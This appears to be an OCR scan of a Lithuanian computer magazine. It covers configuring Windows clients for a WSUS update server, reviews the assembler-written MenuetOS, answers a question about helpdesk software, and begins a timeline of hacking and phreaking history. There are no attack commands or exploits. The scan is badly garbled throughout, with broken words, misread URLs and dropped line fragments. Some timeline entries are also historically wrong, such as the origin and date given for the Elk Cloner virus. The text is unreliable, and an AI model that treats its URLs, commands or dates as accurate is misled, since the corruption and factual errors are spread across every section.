ėjimas prie globaliojo tinklo. Atnaujinimams parsiųsti iš Mic- 
rosoft Update serverių WSUS naudoja 80 (HTTP) ir 443 
(HTTPS) jungtis, beje, šie parametrai negali būti pakeisti. 
Jeigu tu manai, kad šių jungčių atidarymas neigiamai pa- 
veiks tavo sistemos saugumą, siūlyčiau sudaryti „baltąjį są- 
rašą“, į kurį galėtum įtraukti visus adresus, su kuriais ben- 
drauti bus leidžiama. | jį reikia įtraukti: 
http:/Avindowsupdate.microsoft.com 
http://*.windowsupdate.microsoft.com 
https://*.windowsupdate.microsoft.com 
http:/*.update.microsoft.com 
https://*.update.microsoft.com 
http://*.windowsupdate.com 
http:/download.windowsupdate.com 
http://download.microsoft.com 
http://*.download.windowsupdate.com 
http://wustat.windows.com 

http://ntservicepack. microsoft.com 


štai čia: http://go.microsoft.com/fwlink/?LinklD=14232, http:/ 
/go.microsoft.com/fwlink/?LinkID=41777. O mes savo ruožtu 
aptarsime variantą, kai tinkle nėra Active Directory. ir nustaty- 
mus kiekviename kliento kompiuteryje reikia nurodyti rankiniu 
būdu, panaudojant lokalią kompiuterių politiką. Tam kliento 
mašinoje eik į Start -> Run -> įvesk gpedit.msc. Atsiradu- 
siame lange išskleisk Local! Computer Policy -> Computer Con- 
figuration Ir paspausk dešinį pelės klavišą ant punkto Admi- 
nistrative Templates. Kontekstiniame meniu pasirink Add/Re- 
move Templates... toliau — Add... ir pasirink bylą wuau.adm. 
Dabar išskleisk mazgą Windows Components, kur pamatysi 
punktą Windows Update čia ir konfigūruojami automatinių 
atnaujinimų tarnybos nustatymai. Su parametru Configure Au- 
tomatic Updates galima nurodyti kreipimosi į WSUS serverį 
periodiškumą bei atnaujinimų užkrovimo ir įdiegimo tvarką. Dau- 
geliu atvejų tiks variantas „Auto download and schėdule the 
install“. Kitas parametras — Specify intranet Microsoft update 
service location — dar svarbesnis, kadangi čia nurodomas WSUS 
serveris ir jo parametrai. Tam, kad visa sistema pradėtų veikti, 
pirmame tekstiniame lauke įrašyk http://SERVERNAME, kur SER- 
VERNAME — WSUS serverio vardas arba IP adresas. 

O dabar pabandysime prisijungti prie serverio su atnaujinimais. 
Tam visiškai nebūtina laukti to laiko, kada suplanuotas atnauji- 
nimas. Nueik į Start -> Run -> įvesk wuauclt.exe /detectnow. 
Jeigu prisijungimas bus atliktas sėkmingai, tai tavo kompiuterio 
vardas bus atvaizduotas WSUS konsolėje, „Kompiuterių“ sara- 
še. Tau telieka jį pridėti prie reikiamos grupės ir atlikti tą patį 
veiksmą su visais likusiais tinklo kompiuteriais. 


[Pabaigai] Iš esmės didžioji darbo dalis jau padaryta. Tinklo 
kompiuteriai jungiasi prie WSUS serverio ir parsisiunčia reikia- 
mus atnaujinimus. Pats WSUS, priklausomai nuo grupinės po- 
litikos, tvarkingai apdoroja jų užklausas bei parsiunčia reikia- 
mus atnaujinimus iš Windows Update serverio. Tiesa, sinchro- 
nizacija su „Microsoft“ serveriu mūsų sistemos derinimo metu 
buvo atliekama rankiniu režimu (nuspaudus mygtuką „Synchro- 
nize now“). Tai nėra labai patogu, todėl dabar pats laikas perei- 
ti į skyrelį Synchronization options ir nurodyti tau patogų laiką. 
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MenuetOS 


KAI KALBAMA APIE ALTERNATYVIAS OPE- 
RACINES SISTEMAS, PAGALVOK: ALTERNA- 
TWIOS KAM? SAVAIME PERSASI ATSAKY- 
MAS — ALTERNATYVIOS MICROSOFT WIN- 
DOWS SISTEMAI. JŲ NETRŪKSTA. DAUGE- 
LIS WNDOWS KONKURENTŲ YRA UNIX PA- 
LIKUONYS ARBA KLONAI. 


Operacinės sistemos 

dydis taip pat šį tą reiškia 

[„MenuetOS“ unikalumas] Gali susidaryti įspūdis, kad 
ernatyvių operacinių sistemų įvairovė apsiriboja skait- 
lingais Linux distributyvais, daugybe komercinių UNIX ver 
J ir keliomis BSD šakomis. Net ir Macintosh operaci 
nė sistema MacOS X, kuri neseniai buvo perkelta (nu: 
portinta) | x86 platformą ir kuri labai greitai ketina tapti 
pagrindiniu Windows konkurentu, pagrįsta modifikuotu 
FreeBSD branduoliu. O kur gi iš tiesų originalios opera- 
cinės sistemos, kurios nėra kieno nors klonai ar pali- 
kuonys? Viena iš tokių operacinių sistemų yra Menue- 
t0S. Tai yra nuo nulio parašyta 32 bitų daugiaužduotinė 
operacinė sistema, platinama pagal laisvą GNU GPL Ii 
cenciją. Iš karto į akis krenta jos esminis skirtumas 
lyginant su kitomis alternatywiomis operacinėmis siste. 
momis: priešingai nei daugelis šiuolaikinių su aukšto 
lygio programavimo kalbomis sukurtų sistemų, Menue- 
t0S visa parašyta su 32 bitų asembleriu! To rezultate ji 
yra nepaprastai maža (visa MenuetOS nesuspaustu pa- 
vidalu užima viso labo vieną diskelį) ir greita. Operaci 
nės sistemos kūrėjas yra Ville Turjanama, Linuso Tor- 
val tėvynainis. 


[Įdiegimas] MenuetOS įdiegimas labai paprastas. Jis 
kas paprastesnis, nei kitose operacinėse sistemo 
se. Kadangi operacinė sistema užima nedaug vietos ir 
telpa į diskelį, tai visai nebūtina ją įdieginėti į kietąjį 
Būtent dėl to MenuetOS pasileidžia tiesiai iš 
0. Iš pradžių tau reikia iš oficialios svetainės me: 
nuetos.org parsisiųsti distributyvą. Paskutinė stabili Me- 
nuetOS versija straipsnio rašymo metu buvo 0.78. Rei- 
kės pasirinkti iš keleto distributyvų tipų. Yra paprastas 
diskelio atvaizdas (image), pateikiamas kaip .img tipo 
byla, kurią į diskelį galima įrašyti su specialia diskų 
atvaizdų įrašymo programa. Windows vartotojams pa- 
togesnis distributywas bus archwas su jame esančia 
vykdoma byla. Tereikės ją paleisti, o programa pati į 
įdėtą diskelį įrašys atvaizdą. Norint atlikti šį veiksmą, 
papildomos programinės įrangos nereikės. MenuetOS 


naudoja FAT failų sistema, todėl 
bi įrašyto diskelio turinį bus galima 


keap A peržiūrėti iš tavo p pe 
4 Anis racinės sistemos. MenuetOS taip 
o seni pat palaiko FAT32, tu, dirb- 
a we damas su šia nauja sistema, ga 
7 ? " lėsi avo kietojo disko 
ten "k particijų (jeigu, be abejo 1 
: ek ve yra tokios particijo ts 
aš jau senai naudoju tik NTFS 
Taigi tu iš oficialios svetainės 
parsisiuntei vieną ar kitą distributyva ir sėkmingai į diskelį 


įrašei jo atvaizdą. Kas toliau? Dabar reikia perkrauti kompiu 
teri ir sukonfigūruoti BIOS krautis iš lanksčiojo diskelio. BIO: 
S'e galima nurodyti seką, pagal kurią kompiuteris krovimosi 
metu ieško užsikrovimo diskų. Jeigu sąraše pirmiausia nuro 
dytas kietasis diskas ir jame a operacinė sis! 
būtent ji ir bus užkrauta. Tau reikia užl ti Menu 
yra diskelyje, todėl BIOS'e reikia nurodyti, kad disi 
prieš kietąjį diską. Dabar kompiuteris po įjungimo 
sia žiūrės į diskelį, ir jeigu jis įdėtas, tai operacinė 
bus užkrauta būtent iš jo. Po BIOS'0 sukonfigūravimo įsiti 
kink, kad diskelis vietoje, ir perkrauk kompiu Prasideda 
MenuetOS krovimas. Iš pradžių prieš paleidimą nu: 


statymų langas. MenuetOS kol kas nemoka automatiškai nu 


statyti įdiegtos įrangos parametrų, todėl ji prieš pradėdanm 
darbą vartotojui užduoda keletą klausimų. Iš pradžių atsire 
dusiame mėlyname dialogo lange derėtų nurodyti vaizdo re 
žimą, kuris bus naudojamas, ir ekrano skiriamąją gebą. Dau 
eliui konfigūracijų bus priimtinas Vesa 2.0+ režimas, o pa 


eidaujama ir kasdieniniam darbe naudojama ekrano 
skiriamoji geba išsirenkama individualiai. Jeigu tu MenuetOS 
leidi sename kompiuteryje, tai gali būti, jog tau reikės pasi 
rinkti kitą režimą: Vesa 1.0 arba net EGA/CGA. Jeigu pasi 
rinktas Vesa 2.0 režimas, tai toliau bus pateiktas klausimas, 
ar derėtų panaudoti grafinę MTRR akseleraciją. Čia reikėtų 
akyti teigiamai, kad būtų įjungtas aparatinis grafinių vaiz 
dų išvedimo spartinimas. Kitas klausimas susijęs su pelyte 
Ji gali būti prijungta prie PS/2, USB arba prie vieno iš COM 
lizdų, todėl MenuetOS paprašo nurodyti. kur būtent ji įjungta 
Po to bus klausimas apie tai, iš kur operacinė sistema turėtų 
užkrauti virtualų diską. Pasirink punktą pagal nutylėjimą 
krovimąsi iš diskelio 

Tai paskutinis konfigūratoriaus klausimas, po kurio prasideda 
pats operacinės sistemos užkrovimas. Čia reikėtų šiek tiek pa- 
laukti, po to pasirodys pranešimas, jog užkrovimas baigtas, po 
ko norint pradėti darbą reikia nuspausti Escape klavišą. Dabar 
užkrauta MenuetOS paruošta darbui. 


[Sasaja ir programos] Taigi kaip atrodo MenuetOS vartotojo 
sąsaja? Galiu pasakyti, kad ji visiškai atitiko mano vizija, kaip 
turėtų atrodyti šiuolaikinės operacinės sistemos grafinė sąsa 
ja. Kadangi GUI įmontuota tiesiog į branduolį, ji veikia labai 


greitai. Viršuje yra užduočių juosta su laikrodžių Ir didelis my 
tukas, ant kurio užrašyta spėkit kas? be al 
105. Paspaudus šį mygtuką, kaip 
sisteminis meniu, iš kurio galima prieiti prie visų nustaty 
programų. Ant darbastalio (desktop) su foniniu pa 
yra kai kurių programų paleidimo piktogramos (ikonos). Lan- 
gai turi įprastinės išvaizdos antraštes su dešini n 
čiu kryžiuku, skirtu langui uždaryti. Kitaip tariant, čia n 
ko, kas kardinaliai skirtųsi nuo mums įprastos vartotojo sąsa- 
jos. Darbastalio fonu (wallpaper) gali būti bet koks bmp arba 
Jjpeg formato paveikslėlis. Darbastalio išdėstymą taip 
ma reguliuoti. Ant darbastalio galima pridėti papildo: 
mentų, tačiau ne taip, kaip tai daroma Window 
kontekstinio meniu pasirinkti „Ne - Shorto 
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cialią programą, kuri taip ir vadinasi — Desktop. Joje galim 
nurodyti paleidžiamos programos poziciją, ikonėlę ir pavadini- 
mą. Graži ir greita sąsaja — tai, be jokios abejo „labai 
gerai, tačiau operacinė sistema be ikonėlių rodymo ant dar 


bastalio turi mokėti daryti daugiau. Operacinės sistemos vertę 
nustato programų, kurios gali būti joje paleistos, rinkiny, 
žiūrėsime, kaip šiuo atžvilgiu sekasi MenuetOS. Kartu su 
dartine MenuetOS sistema pateikiama ganėtinai daug pr 
mų. Išskleisk pagrindinį meniu, ir tu pamatysi aštuonis sut 
meniu, kiekviename kurių yra keletas vienos ar kitos kategori 
jos programų. Submeniu pavadinimai (Coding 
dio, Graphics) leidžia aiškiai suprasti, kad sistema tur! pakan 
kamai galimybių. Į ką visų pirma reikia atkreipti dėmesį? Kaip 
Linux neįsivaizduojama be kompiliatoriaus, MenuetOS ne- 
įsivaizduojama be asemblerio. Kartu su sistema komplekte 
pateikiamas FASM, su kuriuo galima kurti MenuetOS skir 
programas. Norint kurti programas, reikia turėti bent elemen 
tarų tekstų redaktorių, kad būtų galima kur nors rašyt 
tekstus. Savaime suprantama, MenuetOS tokį redaktorių turi 
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Jis vadinasi TinyPad, ir kai kuo jis net kietesnis už Windows 
Notepad — jame išryškinama asemblerio kodo sintaksė. Sis 
tema taip pat stebina papildomų kalbų galimybe: MenuetOS 
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Bylų valdymo įrankis, pa ų sąrašas ir sistemos nustatymai 


sistemoje gali naudoti nisų. anglų, suomių (gimtoji kūrėjo kal- 
vokiečių ir prancūzų kalbas. Jas galima keisti sistemos 
nustatymų programoje (ant darbastalio yra Setup, po to punk- 
tas keyboard layout). Be programų kūrimo priemonių, Menue- 
tOS taip pat turi šiek tiek įprastinių taikomųjų programų: grafi- 
nių bmp ir jpeg formatų peržiūros programą, paprastą grafinį 
redaktorių XPaint, ikonėlių redaktorių, skaičiuotuvą ir bylų val- 
dymo įrankį. Atskirai vertėtų paminėti programas, kurios s: 
rinktos į Demos meniu. Jame yra programos, kurios demonst- 
ruoja kokias nors MenuetOS galimybes, pagrinde jos grafinio 
varikliuko. Ten, pavyzdžiui, yra programa „ScreenSaver“, kuri 
pilno ekrano (full-screen) režime demonstruoja gražias trima- 
tes besivartančias figūras. Yra programos, skirtos parodyti, jog 
MenuetOS sistemoje galima sukurti netaisyklingos formos lan- 
gus (pavyzdžiui, apvalius), bei pusiau skaidrius langus. 
MenuetOS turi ir tinklinę dalį, pagrįstą TCP/IP protokolu. Tai 
reiškia, kad su MenuetOS galima išeiti į internetą. Tiesa, į 
MenuetOS kol kas nėra perkelta Firefox naršyklė, tačiau kas 
žino, kaip ten bus toliau :). Sistemoje yra šiek tiek nuosavų 
tinklo įrankių, tarp kurių — telnet, irc, nntp, Ap klientai, nar: 
šyklė ir darbui su pop3 ir smtp pašto protokolais skirtos pro- 
gramos. Yra net žaidimo šachmatais internetu klientas. Be 
šių išvardintų klientų taip pat yra http, ftp ir email serveriai. 
Savaime suprantama, visų šių programų funkcionalumas kur 
kas mažesnis, nei jų analogų iš kitų operacinių sistemų, ta- 
čiau tai nieko nereiškia. MenuetOS tinklo programos skirtos 
parodyti, Kad tokių programų kūrimas šiai operacinei siste- 
mai yra imanomas ir prasmingas. Manau, jog ateityje verta 
iš jų tikėtis funkcionalumo patobulinimų, o kol kas jos pa- 
teiktos kaip demonstracinės programos. Su įmontuotu TCP/ 
IP palaikymu galima prisijungti prie lokalaus tinklo bei pa- 
bandyti išeiti į internetą. Apie tai, kaip sukonfigūruoti tinkline 
MenuetOS dalį, išsamiai parašyta dokumente, kurį galima 
atsidaryti pasirinkus meniu punktą Intemet -> Tools -> In- 
formation. Norint gauti priėjimą prie globaliojo tinklo, reikia 
turėti išorinį modemą (atskirą įrenginį). Jeigu tavo kompiute: 
ryje yra vidinis programinis modemas, tai apie internetą Me- 
nuetOS sistemoje gali pamiršti — kad modemas suveiktų, 
reikia tvarkyklių. 
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Skalčiuotuvas, termnalė te Ir ekrano kopija 


[Užkrovimas iš kietojo disko] Nuolat krauti MenuetOS iš 
diskelio gali atsibosti, todėl iškyla būtinybė tai daryti iš kieto- 
jo disko. Tai galima padaryti panaudojant specialius užkrove 
jus. Norint MenuetOS paleisti kartu su MS-DOS arba Win 
dows 9x, reikia pasinaudoti programa MeOSLoad. Siam už 
krovėjui reikia, kad tavo kompiuteris tenkintų tam tikras sąl 
gas. Particijos, kurioje yra užkrovėjas, failų sistema turėtų 
būti FAT32. Kietasis diskas, kuriame yra ši particija, turėt 
būti prijungtas prie pirmojo IDE valdiklio ir būti vedančiuoju 
įrenginiu (Master). 

Norint įdiegti užkrovėją nėra nieko sudėtingo — tiesiog užkrovė 
jo bylą meosload.com išsaugok šakniniame disko C kataloge. 
Ten pat derėtų įkurdinti ir instaliacinę bylą msetup.exe, Po to 
reikia tiesiog paleisti meosload.com. MS-DOS sistemoje tai 
galima padaryti iš karto, o jeigu tu esi Windows 9x sistemoje, 
tai prieš tai kompiuterį reikia perkrauti „Command prompt only 
režime. Kad kiekvieną kartą nereikėtų rankiniu būdu leisti me: 
osload.com bylos, tu gali sukonfigūruoti užkrovimo meniu, pa 
redaguodamas autoexec.bat ir config. las, MeOSLoad gali 
nepalaikyti kai kurių MenuetOS versijų mingai išbandymus 
praėjusių versijų sąrašą gali rasti dokumentacijoje, kuri guli ar- 
chwve kartu su užkrovėju. 

Norint naudotis MenuetOS kartu su Windows NT/XP/2000, rei 
kia kito užkrovėjo. Norint jį panaudoti, reikės nukopijuoti dvi 
bylas į šakninį C disko katalogą ir pakeisti boot.ini bylą. Po to 
NTLOADER užkrovėjas pats išmoks paleisti MenuetOS. 


Kūrėjai jas paprastai išleidžia tik Windows sistemoms, o ki- 
tas platformas (net ir gana populiarias) jie pamiršta. Ir jeigu 
net Linux sistemoje būna problematiška surasti reik 
kyklę, tai ką jau bekalbėti apie MenuetOS. Norint per mode- 
mą prisijungti prie tiekėjo, reikės sukonfigūruoti PPP progra- 
mą. Tai daroma labai paprastai pakeičiant parametrus 
(telefono numerį, vartotojo vardą ir slaptažodį) tiesiog pro: 
gramos išeities tekste, po ko ta programa perkompiliuojama 
su FASM. Tai gali nustebinti: kam tie sunkumai? Iš tiesų vi 
kas ganėtinai paprasta: toks nustatymų pakeitimo būdas vaiz- 
džiai bei praktiškai pademonstruoja galimybę kurti i sti 
egzistuojančią programinę įrangą tiesiog pačioje MenuetOSs 


mą tvar 


sistemoje. Viskas apie išankstinį PPP sukonfigūravimą ir nau 
dojimą, išsamiai aprašyta byloje ppp.txt. Lokalaus tinklo su- 
sijungimas konfigūruojamas su programa stackcfg. kas ap- 
rašyta byloje stack.txt. Be to, šiame pakankamai dideliame 
dokumente išsamiai aprašomos visos MenuetOS sistemos 
TCP/IP steko galimybės ir apribojimai. 

Laikas sužinoti, kaip MenuetOS sistemoje reikalai su žaidimais. 
O čia viskas iš tiesų puiku. Tu gali mėgautis pasjansu FreeCell 
(kurio analogas Windows sistemoje vadinasi „Solitaire“), yra Te- 
tris, net yra trimatis Doom stiliaus žaidimas su koridoriais, tie- 
sa, be monstrų ir su tokiu savotišku valdymu pele. Egzistuoja 
Ouake perkėlimo (portinimo) į MenuetOS projektas. Jeigu šiuo 
atžvilgiu pavyks ką nors padaryti, bus labai smalsu į tai pažiūrė- 
ti 


[Išvados] Tarp MenuetOS trūkumų galima paminėti tam tik- 
rą su ja pateikiamos programinės įrangos primityvumą. Dau- 
gelio programų sąsajos negalima pavadinti grožio ir patogu- 
mo pavyzdžiais. Ne vienas funkcionalumas apribotas pačio 
mis minimaliausiomis galimybėmis. Tačiau niekas netrukdo 
Išstudijuoti asemblerį, API bei vykdomų bylų formatą Ir para- 
šyti savo MenuetOS skirtas programas. Deja, MenuetOS ne- 
moka automatiškai nustatyti prijungtos įrangos parametrų. 
Dėl to ją tenka konfigūruoti rankiniu būdu. Nepasiruošusiam 
vartotojui greičiausiai bus gana sunku suvokti, kokias reikš- 
mes reikia nurodyti Setup programoje, kad sistema teisingai 
veiktų su aparatūra. 

Nepaisant visų trūkumų, MenuetOS palieka palankų ispūdį. 
Priešingai nei daugelis jos brolių tarp naujų alternatyvių ope- 
racinių sistemų, ji nelūžta dėl kiekvieno nusičiaudėjimo. Ma- 
tosi, jog kūrėjas, rašydamas kodą, skyrė pakankamai dėme- 
sio stabilumui. Per visą mano darbo su MenuetOS laiką ji nė 
karto nepakibo. Vienu metu galima atidaryti daug programų, 
o su greitaveika nėra jokių problemų. Aš manau, kad ilgai- 
niui tobulinimo procese ši operacinė sistema apaugs daugy- 
be kokybiškos programinės įrangos, skirtingų įrenginių tvar 
kyklėmis ir. savaime suprantama, daugybe vartotojų, vienu 
kurių gali tapti ir tu. 


Neseniai pradėjau teikti hostingo paslau- 

gas. Aš esu direktorius, pardavimų vady- 
bininkas ir palaikymo tarnyba viename asme- 
nyje. Kol kas su viskuo sėkmingai susitvar- 
kau, tačiau konsultuoti vartotojus per IC0 ga- 
na nepatogu. Norisi organizuoti taip vadinamą 
HelpDesk, kad bet kuris klientas per patogią 
sąsają galėtų palikti savo pareiškimą (ticket), 
kuriame išdėstytų problemos esmę, tuo pa- 
čiu pateikdamas ir papildomų duomenų (konfi- 
gūracines bylas, konkrečios programinės įran- 
gos modulių versijas ir t.t.). Kaip tai būtų gali- 
ma organizuoti? 


Akivaizdžiausias variantas į serverį į 
specialų web skriptą. Jų ganėtinai daug, 
rekomenduočiau dėmesį atkreipti į (01 Help- 
desk XP PHP V2 (upoint.net/myscripts/help- 
desk.htm), Helpdesksofiware Hesk (www.phpjunky 
ard.com/free-helpdesksoitware.php), TicketMaster 
(www.jynx.net/tm), KBase Knowledge Base 
(scripts.tlewe.com). Tokiu atveju vartotojas paraišką 
galės forminti tiesiog naršyklės lange, per įprastinę 
web sąsają. Paraiškos taip pat aptarnaujamos per 
web sąsają, tuo pačiu užklausų apdorojimu vienu 
metu gali užsiimti keletas žmonių. 
Iš esmės galima apseiti be skriptų (ir su jų konfigū 
ravimu susijusio vargo) ir pasinaudoti specialiai šiam 
reikalui pritaikytomis programomis. Didelių laimėji 
mų šioje srityje pasiekė įrankis ManageEngine Semvi- 
ceDesk Plus (manageerngine.adventnet.com/pro 
ducts/service-desk/), užimanti apie —50 Mb. Sve 
tainėje yra mygtukas Live Demo, kuris vaizdžiai de. 
monstruoja jo galimybes. 
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VISAS MŪSŲ GYVENIMAS — TAI DATOS. 
GIMIMO DIENA, NEPRIKLAUSOMYBĖS DIE- 
NA, NAMIBIJOS ISLAISVINIMO DIENA, NAU- 
JIEJI METAI IR RUGSĖJO PIRMOJI. ĮŽYMIOS 
DATOS — NE TIK PRIEZASTIS GEROMS IS- 
GERTUVĖMS.. KAI KURIAS IŠ JŲ REIKIA ŽI- 
NOTI IR GERBTI AMZINAI :) 


Visa hakeriavimo istorija 

[1945 rugsėjo 9] Harvardo universitete užfiksuota pir- 
moji kompiuterių istorijoje klaida (bug). Kandis, patekusi 
į Mark II Aiken Calculator jungiklių sistemą, nutraukė duo- 
menų perdavimą, tuo pačiu sukeldama klaidą. Klaidą 
pavyko pašalinti, o nelaimingas vabzdys buvo išsaugotas 
kaip muziejinis eksponatas (o dėdulė Bilas Geitsas savo 
knygoje po to rašė: „be abejo, vadinti kandį vabalėliu 
(bug) nėra visiškai teisinga, tačiau taip jau išėjo“ :). 
[1952] Greis Murei Hoper (Grace Murray Hopper) su- 
kūrė pirmąjį kompiliatorių, kuris anglų kalba rašomas 
instrukcijas kompiuteriui transformuodavo į mašininę 
kalbą. Ši moteris, garsi savo darbaia matematikos ir 
automatinio duomenų apdorojimo srityse, taip pat su- 
kūrė pirmaja programavimo kalbą COBOL (Common Bu- 
siness-Oriented Language), kuri buvo skirta UNIVAC 1 
mašinoms. 


[1954] Pasaulio šviesą išvydo pirmoji aukšto lygio kalba For- 
tran. Jos autorius buvo Džonas Bakusas Uohn Backus). 
[1958] Antroji aukšto lygio programavimo kalba buvo pavadinta Lisp, 
oją sukūrė MTI profesorius Džonas Makartis Uohn McCarthy). 
[1959] Masačūsetso technologijos institute gimė hakerių judė- 
jimas. Iš pradžių dirbdami su gremėzdiškais IBM meinfreimais, 
0 po to su šiuolaikiškesnėmis TX-O ir PDP kai kurie instituto 
studentai gilinosi į programavima ir vienas su kitu varžėsi kodo 
optimizavimo mene. Pirmosiomis MTI hakeriškomis žvaigždė- 
mis tapo Piteris Samsonas, Alanas Kotakas, Bobas Sandersas, 
Bilas Gosperis, Džeris Siuzmanas, Piteris Dačas, Bobas Vagne- 
ris, Tomas Naitas ir kiti. 50-ųjų pabaiga ir 60-ųjų pradžia į 
istoriją įėjo kaip „Auksiniai hakeriavimo metai“. 

[1961] Kompiuteryje IBM 7094 buvo paleista pirmoji paskirs- 
tyto laiko sistema CTSS, apjungianti 30 terminalų. 

[1963] Džekas Denisas kartu su kitais MTI studentais pradėjo 
kurti MULTICS (Multiplexed Information and Computing Servi- 
ce). Tai turėjo būti operacinė sistema su 
neregėtomis galimybėmis. Projektas pasi- 
rodė esąs pernelyg ambicingas, o kadangi 
kūrėjai norėjo sukurti idealią sistemą, 0S 
kūrimas truko metų metus. Galiausiai di- 
džioji dalyvių dalis šiuo projektu nusivylė ir 
nesitikėjo jį apskritai kada nors užbaigti, todėl 
60-ujų pabaigoje šis projektas buvo palik. 
tas likimo valiai, kad būtų galima imtis kitų 
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[1964] MTI studentas Stiuartas Nelsonas sukūrė TX kompiute- 
riui skirtą programą, kuri generavo skirtingų dažnių signalus. Pri- 
Jungus mašiną prie telefoninės linijos, jis galėjo manipuliuoti 
telefonų tinklu, nutraukdamas signalą „užimta“ ir skambinda- 
nemokamai. 

[1969 balandžio 7] Išeina pirmasis RFC (Reguest for Com- 
nis) — dokumentas, aprašantis kompiuterių tinklo specifikaci- 
jas. Jį išpublikavo Styvas Krokeris iš Kalifomijos universiteto. 
[1969] Aklas studentas iš Floridos Džo Engresia, kitaip dar ži 
nomas kaip The Whistler, aptiko, kad švilpaujant į telefono ra- 
gelį tam tikrame dažnių diapazone (2600 hercų), galima tele 
foninį signalą perjungti taip, kad tarpmiestiniai skambučiai tampa 
nemokamais. Šis atradimas tapo frykingo plėtojimosi atspirties 
tašku 

[1969 spalio 29] Atliekamas eksperimentinis ARPAnet pir- 
mojo istorijoje kompiuterių tinklo, kurto daugiau nei 7 metus 
projekto paleidimas. Pirmaisiais šio tinklo mazgais tapo Kalifor- 
nijos Universitetas UCLA ir Stenfordo tyrimų institutas. Iki 1971 
metų ARPAnet jau apjungė 23 kompiuterius. 

[1969] Telefonų kompanijos „Bell“ darbuotojai Kenas Tompso- 
nas ir Denis Ričis kuria operacinę sistemą UNIX. Iš pradžių kur. 
ta kaip žaidimo Space Travel paleidimui PDP kompiuteryje skir- 
ta failų sistema, UNIX tapo pačia lanksčiausia ir patogiausia 
visų laikų operacine sistema. 

1970] Kompanija „Digital Eguipment Corporation“ praneša apie 
PDP015011 gamybą. Tai buvo revoliucinis kompiuteris, kuris 
MTI ir kituose Amerikos universitetuose tapo tikrų tikriausia ha- 
keriška mašina. 

[1971] Džonas Dreiperis, kuris vėliau išpopuliarėjo slapwar- 
džiu Cap'n Crunch, aptiko, kad kartu su saldumynais dėžutėje 
ateikiamas švilpukas tiksliai imituoja 2600 Hz diapazono sig: 
Iš savo atradimo Dreiperis sukonstravo įrenginį ir jį pava- 
dino Blue Box, kurį frykeriai daugelį metų naudojo nemoka- 
mam skambinimui ir telefoninių tinklų nulaužimui. 

[1971, spalis] Žurnale „Esguire“ buvo išpublikuotas Rono Ro- 
zenbaumo straipsnis „Mažosios mėlynos dėžutės paslaptys“, iš 
kurio tūkstančiai žmonių sužinojo apie Blue Box'us ir frykerius. 
Jis turėjo įtakos frykingo plėtojimuisi. 

[1972] 36-erių metų antikarinis aktyvistas Ebis Hofmanas pra- 
a leisti informacinį biuletenį The Youth International Party 
ine. Greitai Ebio partnerio, frykerio Al Bell, iniciatyva pavadini- 
ias pakeičiamas į TAP (Technical Assistance Program), o pa. 
grindine leidinio kryptimi tampa įvairių kovai su „biurokratine 
mašina“ skirtų triukų publikavimas. Pavyzdžiui, kaip nemoka- 
mai skambinti iš taksofono. 
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[1973] ARPAnet tinkle pasirodo pirmasis Hakerių žargono žody 
no variantas, vaizduojantis hakerių kultūros pasaulėžiūrą, etiką 
ir ypatybes. 

[1973 vasario 7] Pirma kartą pristatytas FTP (File Transfer Protocol 
[1973 kovas] Pirmieji bandymai užmegzti tarptautini ryši ARPA 
net tinkle tarp Anglijos UCL ir Norvegijos NORSAR universitetų. 
Kompiuterių klekis tinkle pasiekė 2000. 

[1973] Operacinė sistema UNIX visiškai perrašyta C kalba. Ši 
OS tapo de facto standartu, įdiegiamu į Amerikos tyrimų Insti- 
tutų kompiuterius. 

[1973] Koledžo studentai Styvas Džobsas ir Styvas Vo: 
būsimieji „Apple Computer“ įkūrėjai, pradeda savo gimto 
to aukštosiose mokyklose kurti ir platinti Blue Box'us. 
[1974] Boltas, Beranekas ir Niumanas pristato Telnet — pir 
mąją komercinę ARPAnet versiją. 

[1975 kovo 5] Įvyksta pirmasis kompiuterių entuziastų klubo Ho- 
mebrew dalyvių susitikimas. Jo nariai buvo asmeninių kompiule- 
rių pionieriais ir vėliau smarkiai paveikė visą kompiuteriu Istoriją. 
[1977] Bilas Džojus išleidžia pirmąją BSD (Berkeley Software 
Distribution) operacinės sistemos versiją. 

[1979] Atsiranda hakeriški ir frykeriški BBS. Vienais pirmųjų tapo 
legendiniai Sherwood Forest ir Catch-22. kuriuose buvo publi- 
kuojami slapti telefoniniai kodai, kompiuterinių sistemų slapta- 
žodžiai, kreditinių kortelių numeriai ir apsaugų apėjimo būdai 
[1979] Inžinieriai iš Palo Alto įsikūrusio „Xerox“ tyrimu centro 
sukūrė pirmajį kompiuterinį kirminą mažą programele, kuri 
skenuoja tinklą ir ieško nieko neveikiančių kompiuterių. Vado- 
vaudamiesi kilniu tikslų padidinti mašinų darbo efektyvumą, au- 
toriai padėjo pagrindą kompiuterių virusų ir kirminų erai, kurie 
sukėlė milijardus dolerių atsiėjusių nuostolių. 

[1979] Atsiranda apsikeitimo pranešimais sistema USENET, kuri 
iš karto tampa populiariausia bendravimo priemone. 

[1979] Brajenas Kerniganas ir Denis Ričis pasauliui pristato 
programavimo kalbą C. 

[1981] Janas Merfis aka Captain Zap įsilaužia į stambiausios 
telefonų kompanijos ATėT kompiuterius ir taip pakeičia skam- 
bučių tarifų sistemą, kad visi miesto gyventojai dieną skambino 
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naktiniais tarifais ir atvirkščiai. Kompanijos darbuotojams ap- 
tikti ir ištaisyti šią klaidą pavyko tik po 2 dienų. 

[1981 rugsėjo 12] Vokiečių klubo „Chaos“ gimimas. Jo pade- 
dami įkūrėjai Vu Holandas ir Stefenas Verneris ruošėsi kovoti 
prieš vyriausybės kėsinimąsi į asmeninį gyvenimą. Per trumpą 
laiką „Chaos“ tampa žymiausiu Europos hakerių klubu. 
[1981] Aptiktas pirmasis internete plintantis kompiuterių viru- 
sas Elk Clone. Jo šaltinis buvo Teksaso AčM universitetas, 0 
autorius liko nežinomas. 

[1981] Policija areštuoja Rosko gaują, kuriai priklausė Kevinas 
Mitnikas, Rosko Diupeinas, Siuzan Sander ir Stwas Roudsas. 
Si gauja keletą metų terorizavo telefonų ir kompiuterių tinklus, 
tačiau sulaikyti hakerių vis nepavykdavo. Savo bičiulius išdavė 
Rosko meilužė Siuzan, kuri negalėjo jam atleisti išdavystės. 
[1982] Šešių jaunų hakerių grupė, pasivadinusi 414 (rajono 
indekso garbei), nulaužia 60 kompiuterių sistemų. Pagrinde nu- 
kentėjo tyrimų institutai ir mokslo organizacijos, tokios, kaip Los 
Alamos laboratorija ir Manheteno vėžinių susirgimų tyrimų cen- 
tras. 

[1982] Ričardas Stolmanas pradeda GNU 
laisvai platinamo UNIX klono — kūrimą. 
[1983]Amerikos kino teatrų ekranuose pirmą kartą pasirodo 
filmas „Karo žaidimai“ (WarGames), kuriame pagrindinį vaid- 
